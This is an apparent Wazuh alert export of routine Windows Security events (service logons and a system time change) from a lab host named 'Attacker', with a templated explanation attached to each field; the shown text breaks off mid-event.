agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.399681 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:53:07.9865975Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43722 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.407015 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:30.0318323Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43726 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533926.414353 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:30.0970475Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43730 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.421691 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4616 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12288 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:56:00.2089499Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43745 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The system time was changed.
Subject:
Security ID: S-1-5-19
Account Name: LOCAL SERVICE
Account Domain: NT AUTHORITY
Logon ID: 0x3E5
Process Information:
Process ID: 0x1c48
Name: C:\Windows\System32\svchost.exe
Previous Time: 2025-04-20T01:56:00.205999700Z
New Time: 2025-04-20T01:56:00.207016100Z
This event is generated when the system time is changed. It is normal for the Windows Time Service, which runs with System privilege, to change the system time on a regular basis. Other system time changes may be indicative of attempts to tamper with the computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-19 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: LOCAL SERVICE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.previousTime: 2025-04-20T01:56:00.2059997Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.newTime: 2025-04-20T01:56:00.2070161Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 0x1c48 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.424894 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:03.5251845Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43748 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 13300 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533927.432232 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:05.0009011Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43750 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
